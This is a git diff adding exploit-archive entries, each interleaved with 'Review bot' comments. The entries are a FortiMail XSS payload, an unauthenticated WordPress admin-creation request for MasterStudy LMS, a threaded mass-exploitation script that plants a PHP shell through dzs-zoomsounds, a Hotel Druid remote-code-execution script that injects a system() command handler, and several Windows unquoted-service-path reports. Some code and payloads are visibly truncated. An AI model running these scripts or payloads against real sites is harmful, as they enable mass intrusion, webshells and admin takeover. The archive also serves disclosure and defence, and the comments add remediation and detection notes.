diff --git a/exploits/multiple/webapps/50759.txt b/exploits/multiple/webapps/50759.txt
new file mode 100644
index 000000000..c78c02d49
--- /dev/null
+++ b/exploits/multiple/webapps/50759.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
+# Google Dork: inurl:/fmlurlsvc/
+# Date: 01-Feb-2022
+# Exploit Author: Braiant Giraldo Villa
+# Contact: @iron_fortress (Twitter)
+# Vendor Homepage: https://www.fortinet.com/products/email-security
+# Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online)
+# Version:
+# FortiMail version 7.0.1 and below
+# FortiMail version 6.4.5 and below
+# FortiMail version 6.2.7 and below
+# CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)
+
+
+1. Description:
+An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
+
+2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E
+3. Proof of Concept:
+https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E
+
+4. References
+https://www.fortiguard.com/psirt/FG-IR-21-185
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062
\ No newline at end of file
diff --git a/exploits/php/webapps/50752.txt b/exploits/php/webapps/50752.txt
new file mode 100644
index 000000000..3c90f09a6
--- /dev/null
+++ b/exploits/php/webapps/50752.txt
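Review bot: The `# Version:` header lists the affected FortiMail branches (7.0.1, 6.4.5, 6.2.7 "and below") but never the fixed releases, so a reader cannot tell from this page whether a given install is patched; the References section already points at FG-IR-21-185, so add the remediation line under the header, e.g. `# Fixed in: <fixed versions per FG-IR-21-185>` with the values taken from that advisory. The `2. Payload:` line and the `3. Proof of Concept:` line also spell the `url` value differently (`%2F%google.com` vs `%2F%2Fgoogle.com`), which looks like a transcription slip; the two should agree. A one-line mitigation note (the affected component is the `/fmlurlsvc/` URI-protection endpoint named in the Google Dork, which is what WAF/log rules should key on) would make the advisory self-contained.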
@@ -0,0 +1,21 @@ +# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation +# Date: 16.02.2022 +# Author: Numan Türle +# CVE: CVE-2022-0441 +# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ +# Version: <2.7.6 +# https://www.youtube.com/watch?v=SI_O6CHXMZk +# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6 +# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed + + +POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1 +Connection: close +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate +Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 +Content-Type: application/json +Content-Length: 339 + +{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}} \ No newline at end of file diff --git a/exploits/php/webapps/50753.py b/exploits/php/webapps/50753.py new file mode 100755 index 000000000..221884261 --- /dev/null +++ b/exploits/php/webapps/50753.py 
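Review bot: The request body shows where the escalation happens (`profile_default_fields_for_register` → `wp_capabilities` → `{"administrator":1}`), but the file never states the root cause or what a defender should look for, and the header only says `Version: <2.7.6`. Suggest a comment block after the links: `# Root cause: the stm_lms_register AJAX handler trusts client-supplied profile fields, including wp_capabilities, so an unauthenticated registration can self-assign the administrator role; fixed in 2.7.6.` followed by `# Detection: admin-ajax.php requests with action=stm_lms_register whose JSON body contains "wp_capabilities"; audit wp_users for unexpected administrators.` Note as well that `Content-Length: 339` matches only the literal placeholder body (`USERNAME`, `EMAIL@TLD`, `PASSWORD`), which is worth saying so the example is not copied verbatim.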
@@ -0,0 +1,111 @@ +# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated) +# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds +# Date: 16/02/2022 +# Exploit Author: Overthinker1877 (1877 Team) +# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ +# Version: 6.60 +# Tested on: Windows / Linux + +import os +import requests +import threading +from multiprocessing.dummy import Pool,Lock +from bs4 import BeautifulSoup +import time +import smtplib,sys,ctypes +from random import choice +from colorama import Fore +from colorama import Style +from colorama import init +import re +import time +from time import sleep +init(autoreset=True) +fr = Fore.RED +gr = Fore.BLUE +fc = Fore.CYAN +fw = Fore.WHITE +fy = Fore.YELLOW +fg = Fore.GREEN +sd = Style.DIM +sn = Style.NORMAL +sb = Style.BRIGHT +Bad = 0 +Good = 0 +def Folder(directory): + if not os.path.exists(directory): + os.makedirs(directory) +Folder("exploited") +def clear(): + try: + if os.name == 'nt': + os.system('cls') + else: + os.system('clear') + except: + pass +def finder(i) : + global Bad,Good + head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} + try : + x = requests.session() + listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php'] + for script in listaa : + url = (i+"/"+script) + while True : + req_first = x.get(url, headers=head) + if "error:http raw post data does not exist" in req_first.text : + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"} + burp0_data = "\".$_FILES['f']['name'].\"\");\r\n?>" + requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45) + urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php") + req_second = x.get(urlx, 
headers=head) + if "Overthinker1877" in req_second.text : + Good = Good + 1 + print(fg+"Exploited "+fw+">> "+fg+" = "+urlx) + with open("exploited/shell.txt","a") as file : + file.write(urlx+"\n") + file.close() + else : + Bad = Bad + 1 + print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit") + else : + Bad = Bad + 1 + print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln") + + pass + break + except : + pass + if os.name == 'nt': + ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad)) + else : + sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad)) + +def key_logo(): + clear = '\x1b[0m' + colors = [36, 32, 34, 35, 31, 37] + x = ' [ + ] OVERTHINKER1877 EXPLOIT' + for N, line in enumerate(x.split('\n')): + sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear)) + time.sleep(0.05) + +def process(line): + time.sleep(1) + + +def run() : + key_logo() + clear() + print(""" + [-] -----------------------------------------[-] + [+] WwW.1877.TeaM + [-] -----------------------------------------[-] + \n \n""") + file_name = input("Website List : ") + op = open(file_name,'r').read().splitlines() + TEXTList = [list.strip() for list in op] + p = Pool(int(input('Thread : '))) + p.map(finder, TEXTList) + +run() \ No newline at end of file diff --git a/exploits/php/webapps/50754.py b/exploits/php/webapps/50754.py new file mode 100755 index 000000000..c08df71f3 --- /dev/null +++ b/exploits/php/webapps/50754.py 
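Review bot: The bare `except: pass` that closes the `try` in `finder` swallows every exception, including `KeyboardInterrupt`, so a run cannot be interrupted cleanly and a network error moves neither `Good` nor `Bad`, which makes the `Exploited-{}` / `Not Vuln-{}` title counters unreliable; narrow it to `except requests.RequestException as e:` and print the host with the error. The same function also wraps a body that always `break`s after one pass in `while True:`, calls `file.close()` inside a `with`, and the module imports `time` twice and never uses `threading`, `smtplib`, `re`, `BeautifulSoup` or `Lock`; `[list.strip() for list in op]` in `run` shadows the builtin and the file list is opened without a context manager. For anyone triaging a site this tool has touched, the artifacts on the page are a GET to the plugin's `savepng.php` with a `location=` parameter, a POST to the same URL, and a new `.php` file under the plugin directory — that sequence is what to alert on and remove.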
@@ -0,0 +1,144 @@ +# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE) +# Date: 05/01/2022 +# Exploit Author: 0z09e (https://twitter.com/0z09e) +# Vendor Homepage: https://www.hoteldruid.com/ +# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz +# Version: 3.0.3 +# CVE : CVE-2022-22909 + +#!/usr/bin/python3 +import requests +import argparse + +def login( target , username = "" , password = "", noauth=False): + login_data = { + "vers_hinc" : "1", + "nome_utente_phpr" : username, + "password_phpr" : password + } + if not noauth: + login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False ) + if ' ')[0] + anno = login_req.text.split('')[0] + ret_data = {"token" : token , "anno" : anno} + #print("ret data" + ret_data) + return ret_data + else: + return False + else: + login_req = requests.get(f"{target}/inizio.php" , verify=False ) + try: + anno = login_req.text.split('')[0] + token = "" + ret_data = {"token" : token , "anno" : anno} + return ret_data + except: + return False + +def check_privilege(target , anno , token=""): + priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False) + #print(priv_req.text) + if "Modify" in priv_req.text: + return True + else: + return False + +def add_room(target , anno , token=""): + add_room_data = { + "anno": anno, + "id_sessione": token, + "n_app":"{${system($_REQUEST['cmd'])}}", + "crea_app":"SI", + "crea_letti":"", + "n_letti":"", + "tipo_tabella":"appartamenti" + } + add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False) + #print(add_req.text) + if "has been added" in add_req.text: + return True + else: + return False +def test_code_execution(target): + code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id") + if "uid=" in code_execution_req.text: + return code_execution_req.text.split("\n")[0] + else: + return False + + +def main(): + + 
banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$ +| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$ +| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ +| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$ +| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$ +| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$ +| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$ +|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n""" + + + parser = argparse.ArgumentParser() + req_args = parser.add_argument_group('required arguments') + req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True) + req_args.add_argument("-u" , "--username" , help="Username" , required=False) + req_args.add_argument("-p" , "--password" , help="password", required=False) + req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False) + args = parser.parse_args() + + target = args.target + if target[-1] == "/": + target = target[:-1] + noauth = args.noauth + + username = args.username + password = args.password + + if noauth == False and (username == None or password == None): + print('[-] Please provide the authentication method.' 
) + quit() + + print(banner) + if not noauth: + print(f"[*] Logging in with the credential {username}:{password}") + login_result = login(username = username , password = password , target = target) + if login_result != False: + token = login_result.get('token') + anno = login_result.get('anno') + else: + print("[-] Login failed, Check your credential or check if login is required or not .") + quit() + else: + print('[*] Trying to access the Dashboard.') + login_result = login(username = username , password = password , target = target , noauth=True) + if login_result != False: + token = login_result.get('token') + anno = login_result.get('anno') + else: + print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.') + exit() + print("[*] Checking the privilege of the user.") + if check_privilege(target= target , token=token , anno=anno): + print("[+] User has the privilege to add room.") + else: + print("[-] User doesn't have the privilege to add room.") + exit() + print("[*] Adding a new room.") + if add_room(target = target , anno=anno , token=token): + print('[+] Room has been added successfully.') + else: + print('[-] Unknown error occured, unable to add room. Maybe the room has already been added') + exit() + print('[*] Testing code exection') + output = test_code_execution(target = target) + if output != False: + print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.") + print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id') + print(f"[+] Example Output : {output}") + exit() + else: + print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname") + exit() +main() \ No newline at end of file 
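Review bot: The value `add_room` submits as the room name (`{${system($_REQUEST['cmd'])}}`) is persisted by the application in `dati/selectappartamenti.php`, and nothing in `main()` removes it afterwards — the only hint is the "Maybe the room has already been added" failure branch; add a header comment such as `# NOTE: the injected room name is stored in dati/selectappartamenti.php and remains after the run; delete the room to clean up a test instance`. `test_code_execution` also drops the `verify=False` that every other request passes, so against a self-signed lab host the final check fails after the earlier steps succeeded. Smaller points: `if noauth == False and (username == None or password == None)` should use `is not`/`is None`, the script mixes `quit()` and `exit()`, and `main()` runs unguarded at import time. The body of `login` as rendered here looks truncated by the extraction (`if ' ')[0]`), so I have not reviewed that function.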
diff --git a/exploits/windows/local/50755.txt b/exploits/windows/local/50755.txt new file mode 100644 index 000000000..263342690 --- /dev/null +++ b/exploits/windows/local/50755.txt @@ -0,0 +1,35 @@ +# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download.wondershare.com/drfone_full3360.exe +# Tested Version: 11.4.9 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """ + +Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto + + +# Service info: + +C:\>sc qc DFWSIDService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: DFWSIDService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare WSID help + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50756.txt b/exploits/windows/local/50756.txt new file mode 100644 index 000000000..b207ba586 --- /dev/null +++ b/exploits/windows/local/50756.txt 
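Review bot: The report shows that `BINARY_PATH_NAME` is unquoted and contains spaces, but not the precondition that makes that exploitable — a non-administrator being able to create a file in `C:\Program Files (x86)\Wondershare\` or `C:\Program Files (x86)\` — so as written this is a configuration finding rather than a demonstrated local privilege escalation; add the ACL output for those directories, or state that they carry default ACLs (in which case the issue is not exploitable). The closing `#Exploit:` paragraph is generic boilerplate and should also carry the one-line remediation, quoting the path: `sc config DFWSIDService binPath= "\"C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe\""`. The same gap applies to 50756, 50757 and 50758, and to 50760–50764, which additionally omit the discovery command and show the `sc qc` output only.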
@@ -0,0 +1,35 @@ +# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download.wondershare.com/mobiletrans_full5793.exe +# Tested Version: 3.5.9 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """ + +Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto + + +# Service info: + +C:\>sc qc ElevationService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ElevationService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Driver Install Service help + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50757.txt b/exploits/windows/local/50757.txt new file mode 100644 index 000000000..678af2617 --- /dev/null +++ b/exploits/windows/local/50757.txt 
@@ -0,0 +1,35 @@ +# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe +# Tested Version: 1.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """ + +FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto + + +# Service info: + +C:\>sc qc FSService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: FSService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : FSService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50758.txt b/exploits/windows/local/50758.txt new file mode 100644 index 000000000..4820d23d6 --- /dev/null +++ b/exploits/windows/local/50758.txt 
@@ -0,0 +1,35 @@ +# Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-17 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download.wondershare.com/ubackit_full8767.exe +# Tested Version: 2.0.5 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """ + +Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto + + +# Service info: + +C:\>sc qc wsbackup +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: wsbackup + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare wsbackup Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/50760.txt b/exploits/windows/local/50760.txt new file mode 100644 index 000000000..45864a597 --- /dev/null +++ b/exploits/windows/local/50760.txt 
@@ -0,0 +1,23 @@ +#Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-17 +#Vendor : TOSHIBA +#Version : TOSHIBA Navi Support Service 1.00.0000 +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== +C:\Users\Administrador>sc qc TNaviSrv +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: TNaviSrv + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD +PLAYER\TNaviSrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : TOSHIBA Navi Support Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50761.txt b/exploits/windows/local/50761.txt new file mode 100644 index 000000000..d6ceb95f5 --- /dev/null +++ b/exploits/windows/local/50761.txt @@ -0,0 +1,25 @@ +#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path +#Exploit Date: 2022-02-17 +#Vendor : IVT Corp +#Version : BlueSoleilCS 5.4.277 +#Vendor Homepage : www.ivtcorporation.com +#Tested on OS: Windows 7 Pro + +#This software installs EDTService.exe version 11.10.2.1 + +#Analyze PoC : +============== +C:\>sc qc BlueSoleilCS +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: BlueSoleilCS + TIPO : 120 WIN32_SHARE_PROCESS (interactive) + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\IVT +Corporation\BlueSoleil\BlueSoleilCS.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : BlueSoleilCS + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50762.txt b/exploits/windows/local/50762.txt new file mode 100644 index 000000000..88bb666ff --- /dev/null +++ b/exploits/windows/local/50762.txt 
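Review bot: In 50761 the line `#This software installs EDTService.exe version 11.10.2.1` names a binary that appears nowhere else in the report — the service queried is `BlueSoleilCS` and its `NOMBRE_RUTA_BINARIO` is `BlueSoleilCS.exe` — so it reads as a leftover from another template and should be removed or explained. `TIPO : 120 WIN32_SHARE_PROCESS (interactive)` is also the only interactive, shared-process service in this batch and deserves a sentence, since it changes what a substituted binary would run alongside. In both 50760 and 50761 the binary path is split across two lines by mail wrapping (`TOSHIBA DVD` / `PLAYER\TNaviSrv.exe`, `IVT` / `Corporation\BlueSoleil\BlueSoleilCS.exe`), which a reader may take for the literal value; rejoin them or mark the wrap.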
@@ -0,0 +1,26 @@ +#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-17 +#Vendor : Intel +#Version : Intel(R) Management Engine Components 6.0.0.1189 +#Vendor Homepage : https://www.intel.com +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc LMS +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: LMS + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R) +Management Engine Components\LMS\LMS.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Intel(R) Management and Security Application +Local Management Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50763.txt b/exploits/windows/local/50763.txt new file mode 100644 index 000000000..4c4cdaa42 --- /dev/null +++ b/exploits/windows/local/50763.txt @@ -0,0 +1,25 @@ +#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-14 +#Vendor : Hewlett-Packard(HP) +#Version : File Sanitizer for HP ProtectTools 5.0.1.3 +#Vendor Homepage : http://www.hp.com +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc HPFSService +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: HPFSService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File +Sanitizer\HPFSService.exe + GRUPO_ORDEN_CARGA : File System + ETIQUETA : 0 + NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50764.txt b/exploits/windows/local/50764.txt new file mode 100644 index 000000000..39ae1e5d2 --- /dev/null 
+++ b/exploits/windows/local/50764.txt @@ -0,0 +1,27 @@ +#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2022-02-17 +#Vendor : Connectify Inc +#Version : Connectify Hotspot 2018 +#Vendor Homepage : https://www.connectify.me/ +#Tested on OS: Windows 7 Pro + +#Analyze PoC : +============== + +C:\>sc qc Connectify +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Connectify + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Connectify\ConnectifyService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Connectify Hotspot 2018 + DEPENDENCIAS : wlansvc + : winmgmt + : http + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f4c0b3395..708ee1169 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
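Review bot: The title quotes `'ConnectifyService'`, but the `sc qc` output shows `NOMBRE_SERVICIO: Connectify` — `ConnectifyService.exe` is the executable, not the service name — and every other title in this batch quotes the service name; suggest `Connectify Hotspot 2018 - 'Connectify' Unquoted Service Path`, and the matching row added to files_exploits.csv should follow. The dependency list (`wlansvc`, `winmgmt`, `http`) is worth a sentence because it means the service starts late in boot, which affects when a substituted binary would run. As with the sibling reports, the write-ACL precondition on `C:\Program Files (x86)\Connectify\` is not shown.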
@@ -11441,6 +11441,15 @@ id,file,description,date,author,type,platform,port
 50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
 50743,exploits/windows/local/50743.txt,"TeamSpeak 3.5.6 - Insecure File Permissions",1970-01-01,"Aryan Chehreghani",local,windows,
 50745,exploits/windows/local/50745.txt,"Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50755,exploits/windows/local/50755.txt,"Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50756,exploits/windows/local/50756.txt,"Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50757,exploits/windows/local/50757.txt,"Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50758,exploits/windows/local/50758.txt,"Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50760,exploits/windows/local/50760.txt,"TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
+50761,exploits/windows/local/50761.txt,"Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
+50762,exploits/windows/local/50762.txt,"Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
+50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
+50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
